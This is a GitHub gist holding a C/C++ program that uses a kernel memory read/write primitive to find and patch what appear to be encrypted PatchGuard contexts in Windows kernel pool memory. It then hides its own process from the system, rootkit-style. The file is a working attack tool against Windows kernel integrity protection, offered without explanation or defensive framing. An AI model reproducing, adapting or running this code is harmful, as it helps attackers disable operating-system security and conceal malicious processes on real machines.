Skip to content

Instantly share code, notes, and snippets.

@gmh5225

gmh5225/a.c Secret

Forked from waryas/a.c
Created July 18, 2022 11:42
Show Gist options
  • Save gmh5225/0a0c8e3a2d718e2d6f9b6a07d5e0f80a to your computer and use it in GitHub Desktop.
Save gmh5225/0a0c8e3a2d718e2d6f9b6a07d5e0f80a to your computer and use it in GitHub Desktop.
#include "Base.hpp"
typedef ULONG(*DbgPrint)(char* Format);
typedef struct _SYSTEM_BIGPOOL_ENTRY
{
union {
PVOID VirtualAddress;
ULONG_PTR NonPaged : 1;
};
ULONG_PTR SizeInBytes;
union {
UCHAR Tag[4];
ULONG TagUlong;
};
} SYSTEM_BIGPOOL_ENTRY, *PSYSTEM_BIGPOOL_ENTRY;
//from http://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ex/sysinfo/bigpool.htm
typedef struct _SYSTEM_BIGPOOL_INFORMATION {
ULONG Count;
SYSTEM_BIGPOOL_ENTRY AllocatedInfo[ANYSIZE_ARRAY];
} SYSTEM_BIGPOOL_INFORMATION, *PSYSTEM_BIGPOOL_INFORMATION;
typedef NTSTATUS(WINAPI *PNtQuerySystemInformation)(
__in SYSTEM_INFORMATION_CLASS SystemInformationClass,
__inout PVOID SystemInformation,
__in ULONG SystemInformationLength,
__out_opt PULONG ReturnLength
);
int main()
{
auto pmem = InitializeBypass();
auto system = pmem->GetProcessMemory(4);
Kernel kernel(pmem);
auto pid = GetCurrentProcessId();
auto process = pmem->GetProcessMemory(pid);
auto eprocess = pmem->GetEProcess(pid);
FILE* f = fopen("C:\\Windows\\system32\\ntoskrnl.exe", "rb");
printf("%d\n", GetLastError());
_fseeki64(f, 0, SEEK_END);
uint64_t size = _ftelli64(f);
_fseeki64(f, 0, SEEK_SET);
auto ntos = new uint8_t[size];
fread((char*)ntos, size, 1, f);
fclose(f);
uint8_t sig[] = {
0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,
0x58 ,0x08 ,0x48 ,0x89 ,0x70 ,
0x18 ,0x48 ,0x89 ,0x78 ,0x20 ,
0x48 ,0x89 ,0x50 ,0x10 ,0x55 ,
0x41 ,0x54 ,0x41 ,0x55 ,0x41 ,
0x56 ,0x41 ,0x57 ,0x48 ,0x81 ,
0xEC ,0xC0 ,0x02 ,0x00 ,0x00 };
uint8_t mask[] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
uint64_t pg = 0;
for (uint64_t cursor = 0; cursor <= size; cursor++)
{
for (uint64_t position = 0; position < sizeof(sig);)
{
if (mask[position] != '?' && ntos[cursor + position] != sig[position])
break;
else
position++;
if (position == sizeof(sig))
{
pg = cursor; break;
}
}
}
uint64_t k1 = *(uint64_t*)(&ntos[pg+000]);
uint64_t k2 = *(uint64_t*)(&ntos[pg + 0x008]);
uint64_t k3 = *(uint64_t*)(&ntos[pg + 0x800]);
uint64_t k4 = *(uint64_t*)(&ntos[pg + 0x808]);
HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");
if (query == NULL) {
printf("GetProcAddress() failed.\n");
return 1;
}
unsigned int len = sizeof(SYSTEM_BIGPOOL_INFORMATION);
unsigned long out;
PSYSTEM_BIGPOOL_INFORMATION info = NULL;
NTSTATUS status = ERROR;
do {
len *= 2;
info = (PSYSTEM_BIGPOOL_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
status = query(SystemBigPoolInformation, info, len, &out);
} while (status == (NTSTATUS)0xc0000004);
if (!SUCCEEDED(status)) {
printf("NtQuerySystemInformation failed with error code 0x%X\n", status);
return 1;
}
for (unsigned int j = 0; j < info->Count; j++) {
SYSTEM_BIGPOOL_ENTRY poolEntry = info->AllocatedInfo[j];
if (poolEntry.SizeInBytes >= 0x1000) {
unsigned int len = poolEntry.SizeInBytes;
unsigned int room = len;
unsigned int i = 0;
while (room) {
auto asm1 = (uint64_t*)process->Read<uint8_t>((void*)((uint64_t)poolEntry.VirtualAddress + i));
auto asm2 = (uint64_t*)process->Read<uint8_t>((void*)((uint64_t)poolEntry.VirtualAddress + i + 0x8));
auto asm3 = (uint64_t*)process->Read<uint8_t>((void*)((uint64_t)poolEntry.VirtualAddress + i + 0x800));
auto asm4 = (uint64_t*)process->Read<uint8_t>((void*)((uint64_t)poolEntry.VirtualAddress + i + 0x808));
if (asm1 && asm2 && asm3 && asm4) {
if ((*asm1 ^ k1) == (*asm3 ^ k3)
&& (*asm2 ^ k2) == (*asm4 ^ k4))
{
auto key1 = (*asm1 ^ k1);
auto key2 = (*asm2 ^ k2);
unsigned char patch[16] = { 0 };
*(uint64_t*)&patch[0] = 0x5500000100828348LL ^ key1;
*(uint64_t*)&patch[8] = 0x90909090c3d08948LL ^ key2;
process->Write<uint64_t>((void*)((uint64_t)poolEntry.VirtualAddress + i), (uint64_t*)&patch[0]);
process->Write<uint64_t>((void*)((uint64_t)poolEntry.VirtualAddress + i + 0x8), (uint64_t*)&patch[8]);
printf("Patched context\n");
}
}
else {
}
i++;
room--;
}
}
}
kernel.HideProcess(eprocess);
printf("Process hidden, exit will bsod but this can run forever!\n");
while (1)
Sleep(1000);
printf("Press any key to exit\n");
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment